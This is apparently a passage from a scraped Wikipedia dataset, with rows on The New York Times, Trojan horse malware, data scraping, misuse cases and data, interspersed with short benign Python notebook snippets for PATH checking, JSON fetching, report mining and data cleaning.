In addition, a "Reporter Reads" section features Times journalists reading their articles and providing commentary. 300 The New York Times has used video games as part of its journalistic efforts, among the first publications to do so, 301 contributing to an increase in Internet traffic; 302 the publication has also developed its own video games. In 2014, The New York Times Magazine introduced Spelling Bee, a word game in which players guess words from a set of letters in a honeycomb and are awarded points for the length of the word and receive extra points if the word is a pangram. 303 The game was proposed by Will Shortz, created by Frank Longo, and has been maintained by Sam Ezersky. In May 2018, Spelling Bee was published on nytimes.com, furthering its popularity. 304 In February 2019, the Times introduced Letter Boxed, in which players form words from letters placed on the edges of a square box, 305 followed in June 2019 by Tiles, a matching game in which players form sequences of tile pairings, and Vertex, in which players connect vertices to assemble an image. 306 In July 2023, The New York Times introduced Connections, in which players identify groups of words that are connected by a common property. 307 In April, the Times introduced Digits, a game that required using operations on different values to reach a set number; Digits was shut down in August. 308 In March 2024, The New York Times released Strands, a themed word search. 309 In January 2022, The New York Times Company acquired Wordle, a word game developed by Josh Wardle in 2021, at a valuation in the "low-seven figures". 310 The acquisition was proposed by David Perpich, a member of the Sulzberger family who proposed the purchase to Knight 311 over Slack after reading about the game. 312 The Washington Post purportedly considered acquiring Wordle, according to Vanity Fair. 311 At the 2022 Game Developers Conference, Wardle stated that he was overwhelmed by the volume of Wordle facsimiles and overzealous monetization practices in other games. 313 Concerns over The New York Times monetizing Wordle by implementing a paywall mounted; 314 Wordle is a client-side browser game and can be played offline by downloading its webpage. 315 Wordle moved to the Times's servers and website in February. 316 The game was added to the NYT Games application in August, 317 necessitating it be rewritten in the JavaScript library React. 318 In November, The New York Times announced that Tracy Bennett would be the Wordle's editor. 319 The New York Times Magazine and The Boston Globe Magazine are the only weekly Sunday magazines following The Washington Post Magazine's cancellation in December 2022. 320 In February 2016, The New York Times introduced a Spanish website, The New York Times en Espa ol. 321 The website, intended to be read on mobile devices, would contain translated articles from the Times and reporting from journalists based in Mexico City. 322 The Times en Espa ol's style editor is Paulina Chavira, who has advocated for pluralistic Spanish to accommodate the variety of nationalities in the newsroom's journalists and wrote a stylebook for The New York Times en Espa ol 323 Articles the Times intends to publish in Spanish are sent to a translation agency and adapted for Spanish writing conventions; the present progressive tense may be used for forthcoming events in English, but other tenses are preferable in Spanish. 
For style questions, the Times en Español consults the Real Academia Española and Fundéu and frequently modifies the use of diacritics — such as using an acute accent for the Cártel de Sinaloa but not the Cartel de Medellín — and uses the gender-neutral pronoun elle. 324 Headlines in The New York Times en Español do not use title-case capitalization. The Times en Español publishes El Times, a newsletter led by Elda Cantú intended for all Spanish speakers. 325 In September 2019, The New York Times ended The New York Times en Español's separate operations. 326 A study published in The Translator in 2023 found that the Times en Español engaged in tabloidization. 327 In June 2012, The New York Times introduced a Chinese-language website, cn.nytimes.com, in response to Chinese editions created by The Wall Street Journal and the Financial Times. Conscious of censorship, the Times established servers outside of China and affirmed that the website would uphold the paper's journalistic standards; the government of China had previously blocked articles from nytimes.com through the Great Firewall, 328 and nytimes.com had been blocked in China until August 2001, after then-general secretary Jiang Zemin met with journalists from The New York Times. 329 Then-foreign editor Joseph Kahn assisted in the establishment of cn.nytimes.com, an effort that contributed to his appointment as executive editor in April 2022. 330 In October, the Times published an article detailing the wealth of then-premier Wen Jiabao's family. In response, the government of China blocked access to nytimes.com and cn.nytimes.com, and references to the Times and Wen were censored on the microblogging service Sina Weibo. 329 In March 2015, a mirror of cn.nytimes.com and the website for GreatFire were the targets of a government-sanctioned distributed denial-of-service attack on GitHub, disabling access to the service for several days. 331 Chinese authorities requested the removal of The New York Times's news applications from the App Store in December 2016. 332 As of 2023, The New York Times has received 137 Pulitzer Prizes, 333 the most of any publication. 334 The New York Times is considered a newspaper of record in the United States. l The Times is the largest metropolitan newspaper in the United States; 338 as of 2022, The New York Times is the second-largest newspaper by print circulation in the United States behind The Wall Street Journal. 193 A study published in Science, Technology, & Human Values in 2013 found that The New York Times received more citations in academic journals than the American Sociological Review, Research Policy, or the Harvard Law Review. 339 With sixteen million unique records, the Times is the third-most referenced source in Common Crawl, a collection of online material used in datasets such as GPT-3, behind Wikipedia and a United States patent database. 340 The New Yorker's Max Norman wrote in March 2023 that the Times has shaped mainstream English usage. 341 In a January 2018 article for The Washington Post, Margaret Sullivan stated that The New York Times affects the "whole media and political ecosystem". 342 The New York Times's success has led to concerns over media consolidation, particularly amid the decline of newspapers. In 2006, economists Lisa George and Joel Waldfogel examined the effect of the Times's national distribution strategy on the circulation of local newspapers, finding that local circulation decreased among college-educated readers. 
343 This effect was observed at The Forum of Fargo-Moorhead, the newspaper of record for Fargo, North Dakota. 344 Axios founder Jim VandeHei opined that the Times is "going to basically be a monopoly" in a column written by then-media columnist and former BuzzFeed News editor-in-chief Ben Smith; in the article, Smith cites the strength of The New York Times's journalistic workforce, its broadening content, and its recruitment of Gawker editor-in-chief Choire Sicha, Recode editor-in-chief Kara Swisher, and Quartz editor-in-chief Kevin Delaney. Smith compared the Times to the New York Yankees during their 1927 Murderers' Row season. 345 The New York Times has received criticism for its coverage of the Israel–Hamas war, 346 and the paper has been accused of holding both an anti-Palestinian 347 and an anti-Israeli 348 bias. In April 2024, The Intercept reported that an internal memorandum from November 2023 instructed journalists to limit the use of the terms "genocide" and "ethnic cleansing", to avoid the phrase "occupied territory" in the context of Palestinian land, to avoid the word "Palestine" except in rare circumstances, and to avoid the term "refugee camps" to describe areas of Gaza despite their recognition by the United Nations. A spokesperson from the Times stated that issuing guidance was standard practice. An analysis by The Intercept noted that The New York Times described Israeli deaths as a massacre nearly sixty times, but had only described Palestinian deaths as a massacre once. 349 In December 2023, The New York Times published an investigation titled "'Screams Without Words': How Hamas Weaponized Sexual Violence on Oct. 7", alleging that Hamas weaponized sexual and gender-based violence during its armed incursion into Israel. 350 The investigation was the subject of an article from The Intercept that questioned the journalistic acumen of Anat Schwartz, a filmmaker involved in the inquiry who had no prior reporting experience and who had agreed with a post stating Israel should "violate any norm, on the way to victory"; doubted the veracity of the opening claim that Gal Abdush was raped, which her family disputed; and alleged that the Times was pressured by the Committee for Accuracy in Middle East Reporting in America. 351 The New York Times initiated an inquiry that received criticism from NewsGuild of New York president Susan DeCarava for purported racial targeting; 352 the Times's investigation ended inconclusively, but found that journalistic material had been handled improperly. 353 The New York Times has received criticism regarding its coverage of transgender people. When it published an opinion piece by Weill Cornell Medicine professor Richard A. Friedman called "How Changeable Is Gender?" in August 2015, 354 Vox's German Lopez criticized Friedman for suggesting that parents and doctors might be right in letting children suffer from severe dysphoria in case something changes down the line, and for implying that conversion therapy may work for transgender children. 355 In February 2023, nearly one thousand 356 current and former Times writers and contributors wrote an open letter addressed to standards editor Philip B. Corbett, criticizing the paper's coverage of transgender, non-binary, and gender-nonconforming people; some of the Times's articles have been cited in state legislatures attempting to justify criminalizing gender-affirming care. 
357 Contributors wrote in the open letter that "the Times has in recent years treated gender diversity with an eerily familiar mix of pseudoscience and euphemistic, charged language, while publishing reporting on trans children that omits relevant information about its sources." m |
369 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Trojan_horse_(computing) | In computing, a Trojan horse (or simply Trojan) is any malware that misleads users as to its true intent by disguising itself as a standard program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. 1 Trojans are generally spread by some form of social engineering. For example, a user may be duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking on a fake advertisement on social media or elsewhere. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. 2 Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. 3 It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both. 4 Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. 5 It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", 6 subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics. 7 8 Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. 9 In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries, like Switzerland and Germany, have a legal framework governing the use of such software. 10 11 Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer 12 and the German "state Trojan" nicknamed R2D2. 10 German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. 13 Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. 14 BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection. 15 Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems. 
A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping their functionality. If the cloud system identifies the attack as a legitimate service or application, it is executed, which can damage and infect the cloud system. 16 A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security. 17 A simple example is a malicious script masquerading as the Linux sudo command. An attacker would place such a script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password. To prevent a sudo Trojan horse, set the "." entry in the PATH environment variable to be located at the tail end. 18 For example: PATH=/usr/local/bin:/usr/bin:. Having "." somewhere in the PATH is convenient, but there is a catch. 19 Another example is a malicious script named sl rather than ls, exploiting a common mistyping of the ls command; an attacker would place this script in a publicly writable directory (e.g., /tmp) and rely on a user making that typing mistake. The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use. 30 31 |
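The PATH-ordering defense mentioned above is easy to check mechanically. The short Python sketch below flags a "." or empty PATH entry that appears before system directories, which is the situation the sudo and sl examples exploit; it is an illustrative check written for this notebook, not code from the article.

import os

def risky_path_entries(path=None):
    # Split a PATH string (or the current environment's PATH) into entries and
    # report any "." or empty entry that precedes a system directory.
    entries = (path if path is not None else os.environ.get("PATH", "")).split(os.pathsep)
    risky = []
    for position, entry in enumerate(entries):
        if entry in ("", "."):
            if any(later.startswith(("/usr", "/bin", "/sbin"))
                   for later in entries[position + 1:]):
                risky.append((position, entry or "(empty)"))
    return risky

print(risky_path_entries(".:/usr/local/bin:/usr/bin"))   # risky: "." comes first
print(risky_path_entries("/usr/local/bin:/usr/bin:."))   # safer: "." at the tail end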
370 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-9 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport and storage mechanism between the client and the web server. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
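As a concrete illustration of the "listen to the JSON feed" approach described above, the sketch below requests a JSON endpoint with the requests library already used in this notebook and loads the result into pandas. The URL and field names are placeholders; real sites expose different endpoints, and their terms of service may forbid automated access.

import requests
import pandas as pd

FEED_URL = "https://example.com/api/articles?page=1"   # placeholder endpoint

def fetch_feed(url):
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    return response.json()        # the server already returns structured data

try:
    items = fetch_feed(FEED_URL)
    df = pd.DataFrame(items)      # no HTML parsing step is needed for a JSON feed
    print(df.head())
except Exception as error:
    print(f"Feed request failed: {error}")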
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
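Report mining as described above can be done with the same re and pandas tools this notebook already imports: pull fields out of a human-readable spooled report with a regular expression and load them into a DataFrame. The report layout below is invented for illustration.

import re
import pandas as pd

spooled_report = """
DAILY SALES REPORT                        PAGE 1
Customer: ACME CORP        Invoice: 10023   Total:   1,250.00
Customer: GLOBEX INC       Invoice: 10024   Total:     310.50
"""

# Each report line follows a fixed, human-readable pattern we can match directly.
pattern = re.compile(
    r"Customer:\s+(?P<customer>.+?)\s+Invoice:\s+(?P<invoice>\d+)\s+Total:\s+(?P<total>[\d,]+\.\d{2})"
)

rows = [match.groupdict() for match in pattern.finditer(spooled_report)]
df = pd.DataFrame(rows)
df["total"] = df["total"].str.replace(",", "").astype(float)
print(df)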
371 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Misuse_case | Misuse case is a business process modeling tool used in the software development industry. The term Misuse Case or mis-use case is derived from and is the inverse of use case. 1 The term was first used in the 1990s by Guttorm Sindre of the Norwegian University of Science and Technology, and Andreas L. Opdahl of the University of Bergen, Norway. It describes the process of executing a malicious act against a system, while use case can be used to describe any action taken by the system. 2 Use cases specify required behaviour of software and other products under development, and are essentially structured stories or scenarios detailing the normal behavior and usage of the software. A Misuse Case, on the other hand, highlights something that should not happen (i.e. a Negative Scenario), and the threats hence identified help in defining new requirements, which are expressed as new Use Cases. This modeling tool has several strengths; its biggest weakness is its simplicity. It needs to be combined with more powerful tools to establish an adequate plan for the execution of a project. One other weakness is its lack of structure and semantics. In industry, it is important to describe a system's behavior when it responds to a request that originates from outside: use cases 5 have become popular for requirements work 1 among engineers thanks to features such as visual modeling; they describe a system from an actor's viewpoint, and their format explicitly conveys each actor's goals and the flows the system must implement to accomplish them. 6 The level of abstraction of a use case model makes it an appropriate starting point for design activities, thanks to the use of UML use case diagrams and the end user's or domain expert's language. But for software security analyses, developers should pay attention to negative scenarios and understand them. That is why, in the 1990s, the concept of the "inverse of a use case" was born in Norway. The contrast between the misuse case and the use case is the goal: the misuse case describes potential system behaviors that a system's stakeholders consider unacceptable or, as Guttorm Sindre and Andreas L. Opdahl said, "a function that the system should not allow". 1 This difference is also in the scenarios: a "positive" scenario is a sequence of actions leading to a goal desired by a person or organization, while a "negative" one is a scenario whose goal the organization in question does not want to occur, or whose goal is desired by a hostile agent (not necessarily human). 7 Another description of the difference 8 is that, if a use case is a completed sequence of actions which gives increased value to the user, one could define a misuse case as a completed sequence of actions which results in loss for the organization or some specific stakeholder. The "good" and the "bad" cases share a common language for representing the scenario: use case diagrams are formally included in two modeling languages defined by the OMG, the Unified Modeling Language (UML) and the Systems Modeling Language (SysML), and drawing the agents and misuse cases of the scenario explicitly helps focus attention on it. 9 Misuse cases are most commonly used in the field of security. 10 With the ever-growing importance of IT systems, it has become vital for every company to develop the capability to protect its data. 
11 Hence, for example, a misuse case might be used to define what a hacker would want to do with the system and to capture his or her requirements. A developer or designer can then define the requirements of the user and the hacker in the same UML diagram, which in turn helps identify the security risks of the system. 12 A misuse case diagram is created together with a corresponding use case diagram. The model introduces two new important entities in addition to those from the traditional use case model (use case and actor). The misuse case model makes use of the relation types found in the use case model: include, extend, generalize, and association. In addition, it introduces two new relations to be used in the diagram. These new concepts, together with the existing ones from use cases, give a meta model, which is found as fig. 2 in Sindre and Opdahl (2004). 2 There are two different ways of describing a misuse case textually: one is embedded in a use case description template, where an extra description field called Threats can be added. This is the field where misuse case steps (and alternate steps) can be filled in. This is referred to as the lightweight mode of describing a misuse case. The other way of describing a misuse case is to use a separate template for this purpose only. It is suggested to inherit some of the fields from the use case description (Name, Summary, Author, and Date). It also adapts the fields Basic path and Alternative path, which now describe the paths of the misuse cases instead of the use cases. In addition, it is proposed to use several other fields. As one might understand, this full set of fields is too comprehensive to be completely filled out every time. Not all the fields are required to be filled in at the beginning, and the description should thus be viewed as a living document. There has also been some debate about whether to start with diagrams or with descriptions. The recommendation given by Sindre and Opdahl on that matter is that it should be done as with use cases. Sindre and Opdahl propose a five-step process for using misuse cases to identify security requirements, and suggest using a repository of reusable misuse cases as a support in this process. Current research on misuse cases is primarily focused on the security improvements they can bring to a project, software projects in particular. Ways to increase the widespread adoption of the practice of misuse case development during earlier phases of application development are being considered: the sooner a flaw is found, the easier it is to find a patch and the lower the impact is on the final cost of the project. Other research focuses on improving the misuse case to achieve its final goal: for 13 "there is a lack on the application process, and the results are too general and can cause a under-definition or misinterpretation of their concepts". They suggest furthermore "to see the misuse case in the light of a reference model for information system security risk management (ISSRM) to obtain a security risk management process." Misuse cases are well known among researchers; the body of research on the subject demonstrates this knowledge, but beyond the academic world, the misuse case has not been broadly adopted. As Sindre and Opdahl (the parents of the misuse case concept) suggest: "Another important goal for further work is to facilitate broader industrial adoption of misuse cases". 
2 They propose, in the same article, to embed the misuse case in a use case modeling tool and to create a "database" of standard misuse cases to assist software architects. System stakeholders should create their own misuse case charts for requirements that are specific to their own problem domains. Once developed, a knowledge database can reduce the number of standard security flaws exploited by ordinary attackers. Other research has focused on the misuse case's possible lack of concrete solutions: as 14 wrote, "While this approach can help in a high level elicitation of security requirements, it does not show how to associate the misuse cases to legitimate behavior and concrete assets; therefore, it is not clear what misuse case should be considered, nor in what context". These criticisms might be addressed with the suggestions and improvements presented in the preceding section. Standardization of the misuse case as part of the UML notation might allow it to become a mandatory part of project development. "It might be useful to create a specific notation for security functionality, or countermeasures that have been added to mitigate vulnerabilities and threats." 15 |
372 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data | In common usage, data ( de t , also US: d t ) is a collection of discrete or continuous values that convey information, describing the quantity, quality, fact, statistics, other basic units of meaning, or simply sequences of symbols that may be further interpreted formally. A datum is an individual value in a collection of data. Data are usually organized into structures such as tables that provide additional context and meaning, and may themselves be used as data in larger structures. Data may be used as variables in a computational process. 1 2 Data may represent abstract ideas or concrete measurements. 3 Data are commonly used in scientific research, economics, and virtually every other form of human organizational activity. Examples of data sets include price indices (such as the consumer price index), unemployment rates, literacy rates, and census data. In this context, data represent the raw facts and figures from which useful information can be extracted. Data are collected using techniques such as measurement, observation, query, or analysis, and are typically represented as numbers or characters that may be further processed. Field data are data that are collected in an uncontrolled, in-situ environment. Experimental data are data that are generated in the course of a controlled scientific experiment. Data are analyzed using techniques such as calculation, reasoning, discussion, presentation, visualization, or other forms of post-analysis. Prior to analysis, raw data (or unprocessed data) is typically cleaned: Outliers are removed, and obvious instrument or data entry errors are corrected. Data can be seen as the smallest units of factual information that can be used as a basis for calculation, reasoning, or discussion. Data can range from abstract ideas to concrete measurements, including, but not limited to, statistics. Thematically connected data presented in some relevant context can be viewed as information. Contextually connected pieces of information can then be described as data insights or intelligence. The stock of insights and intelligence that accumulate over time resulting from the synthesis of data into information, can then be described as knowledge. Data has been described as "the new oil of the digital economy". 4 5 Data, as a general concept, refers to the fact that some existing information or knowledge is represented or coded in some form suitable for better usage or processing. Advances in computing technologies have led to the advent of big data, which usually refers to very large quantities of data, usually at the petabyte scale. Using traditional data analysis methods and computing, working with such large (and growing) datasets is difficult, even impossible. (Theoretically speaking, infinite data would yield infinite information, which would render extracting insights or intelligence impossible.) In response, the relatively new field of data science uses machine learning (and other artificial intelligence (AI)) methods that allow for efficient applications of analytic methods to big data. The Latin word data is the plural of datum, (thing) given, and the neuter past participle of dare, "to give". 6 The first English use of the word "data" is from the 1640s. The word "data" was first used to mean "transmissible and storable computer information" in 1946. The expression "data processing" was first used in 1954. 
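The passage above notes that raw data is usually cleaned before analysis: obvious entry errors are corrected and outliers removed. As a rough illustration only, here is a minimal pandas sketch (pandas is already imported in this notebook); the DataFrame, column name, and z-score threshold are all invented for the example, and a real pipeline would choose its outlier rule to fit the data.
import pandas as pd

def clean_numeric_column(df: pd.DataFrame, col: str, z_thresh: float = 3.0) -> pd.DataFrame:
    """Drop rows whose value in `col` is non-numeric or a gross outlier."""
    out = df.copy()
    # Coerce entry errors (e.g. "bad") to NaN, then drop those rows
    out[col] = pd.to_numeric(out[col], errors="coerce")
    out = out.dropna(subset=[col])
    # Keep only values within z_thresh standard deviations of the column mean
    z = (out[col] - out[col].mean()) / out[col].std(ddof=0)
    return out[z.abs() <= z_thresh]

# Toy example; the low threshold is only so this tiny sample actually loses its outlier
raw = pd.DataFrame({"value": [10, 12, 11, "13", "bad", 10_000]})
print(clean_numeric_column(raw, "value", z_thresh=1.5))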
6 When "data" is used more generally as a synonym for "information", it is treated as a mass noun in singular form. This usage is common in everyday language and in technical and scientific fields such as software development and computer science. One example of this usage is the term "big data". When used more specifically to refer to the processing and analysis of sets of data, the term retains its plural form. This usage is common in the natural sciences, life sciences, social sciences, software development and computer science, and grew in popularity in the 20th and 21st centuries. Some style guides do not recognize the different meanings of the term and simply recommend the form that best suits the target audience of the guide. For example, APA style as of the 7th edition requires "data" to be treated as a plural form. 7 Data, information, knowledge, and wisdom are closely related concepts, but each has its role concerning the other, and each term has its meaning. According to a common view, data is collected and analyzed; data only becomes information suitable for making decisions once it has been analyzed in some fashion. 8 One can say that the extent to which a set of data is informative to someone depends on the extent to which it is unexpected by that person. The amount of information contained in a data stream may be characterized by its Shannon entropy. Knowledge is the awareness of its environment that some entity possesses, whereas data merely communicates that knowledge. For example, the entry in a database specifying the height of Mount Everest is a datum that communicates a precisely-measured value. This measurement may be included in a book along with other data on Mount Everest to describe the mountain in a manner useful for those who wish to decide on the best method to climb it. Awareness of the characteristics represented by this data is knowledge. Data are often assumed to be the least abstract concept, information the next least, and knowledge the most abstract. 9 In this view, data becomes information by interpretation; e.g., the height of Mount Everest is generally considered "data", a book on Mount Everest geological characteristics may be considered "information", and a climber's guidebook containing practical information on the best way to reach Mount Everest's peak may be considered "knowledge". "Information" bears a diversity of meanings that range from everyday usage to technical use. This view, however, has also been argued to reverse how data emerges from information, and information from knowledge. 10 Generally speaking, the concept of information is closely related to notions of constraint, communication, control, data, form, instruction, knowledge, meaning, mental stimulus, pattern, perception, and representation. Beynon-Davies uses the concept of a sign to differentiate between data and information; data is a series of symbols, while information occurs when the symbols are used to refer to something. 11 12 Before the development of computing devices and machines, people had to manually collect data and impose patterns on it. With the development of computing devices and machines, these devices can also collect data. In the 2010s, computers were widely used in many fields to collect data and sort or process it, in disciplines ranging from marketing, analysis of social service usage by citizens to scientific research. These patterns in the data are seen as information that can be used to enhance knowledge. 
These patterns may be interpreted as "truth" (though "truth" can be a subjective concept) and may be authorized as aesthetic and ethical criteria in some disciplines or cultures. Events that leave behind perceivable physical or virtual remains can be traced back through data. Marks are no longer considered data once the link between the mark and observation is broken. 13 Mechanical computing devices are classified according to how they represent data. An analog computer represents a datum as a voltage, distance, position, or other physical quantity. A digital computer represents a piece of data as a sequence of symbols drawn from a fixed alphabet. The most common digital computers use a binary alphabet, that is, an alphabet of two characters typically denoted "0" and "1". More familiar representations, such as numbers or letters, are then constructed from the binary alphabet. Some special forms of data are distinguished. A computer program is a collection of data, that can be interpreted as instructions. Most computer languages make a distinction between programs and the other data on which programs operate, but in some languages, notably Lisp and similar languages, programs are essentially indistinguishable from other data. It is also useful to distinguish metadata, that is, a description of other data. A similar yet earlier term for metadata is "ancillary data. The prototypical example of metadata is the library catalog, which is a description of the contents of books. Whenever data needs to be registered, data exists in the form of a data document. Kinds of data documents include: Some of these data documents (data repositories, data studies, data sets, and software) are indexed in Data Citation Indexes, while data papers are indexed in traditional bibliographic databases, e.g., Science Citation Index. Gathering data can be accomplished through a primary source (the researcher is the first person to obtain the data) or a secondary source (the researcher obtains the data that has already been collected by other sources, such as data disseminated in a scientific journal). Data analysis methodologies vary and include data triangulation and data percolation. 14 The latter offers an articulate method of collecting, classifying, and analyzing data using five possible angles of analysis (at least three) to maximize the research's objectivity and permit an understanding of the phenomena under investigation as complete as possible: qualitative and quantitative methods, literature reviews (including scholarly articles), interviews with experts, and computer simulation. The data is thereafter "percolated" using a series of pre-determined steps so as to extract the most relevant information. An important field in computer science, technology, and library science is the longevity of data. Scientific research generates huge amounts of data, especially in genomics and astronomy, but also in the medical sciences, e.g. in medical imaging. In the past, scientific data has been published in papers and books, stored in libraries, but more recently practically all data is stored on hard drives or optical discs. However, in contrast to paper, these storage devices may become unreadable after a few decades. Scientific publishers and libraries have been struggling with this problem for a few decades, and there is still no satisfactory solution for the long-term storage of data over centuries or even for eternity. Data accessibility. 
Another problem is that much scientific data is never published or deposited in data repositories such as databases. In a recent survey, data was requested from 516 studies that were published between 2 and 22 years earlier, but fewer than one in five of these studies were able or willing to provide the requested data. Overall, the likelihood of retrieving data dropped by 17% each year after publication. 15 Similarly, a survey of 100 datasets in Dryad found that more than half lacked the details needed to reproduce the research results from these studies. 16 This illustrates the dire state of access to scientific data that is not published or does not have enough detail to be reproduced. A proposed solution to the reproducibility problem is the requirement of FAIR data, that is, data that is Findable, Accessible, Interoperable, and Reusable. Data that fulfills these requirements can be used in subsequent research and thus advances science and technology. 17 Although data are also increasingly used in other fields, it has been suggested that their highly interpretive nature might be at odds with the ethos of data as "given". Peter Checkland introduced the term capta (from the Latin capere, "to take") to distinguish between an immense number of possible data and the sub-set of them to which attention is oriented. 18 Johanna Drucker has argued that since the humanities affirm knowledge production as "situated, partial, and constitutive", using data may introduce assumptions that are counterproductive, for example that phenomena are discrete or observer-independent. 19 The term capta, which emphasizes the act of observation as constitutive, is offered as an alternative to data for visual representations in the humanities. The term data-driven is a neologism applied to an activity that is driven primarily by data rather than by other factors. Data-driven applications include data-driven programming and data-driven journalism. |
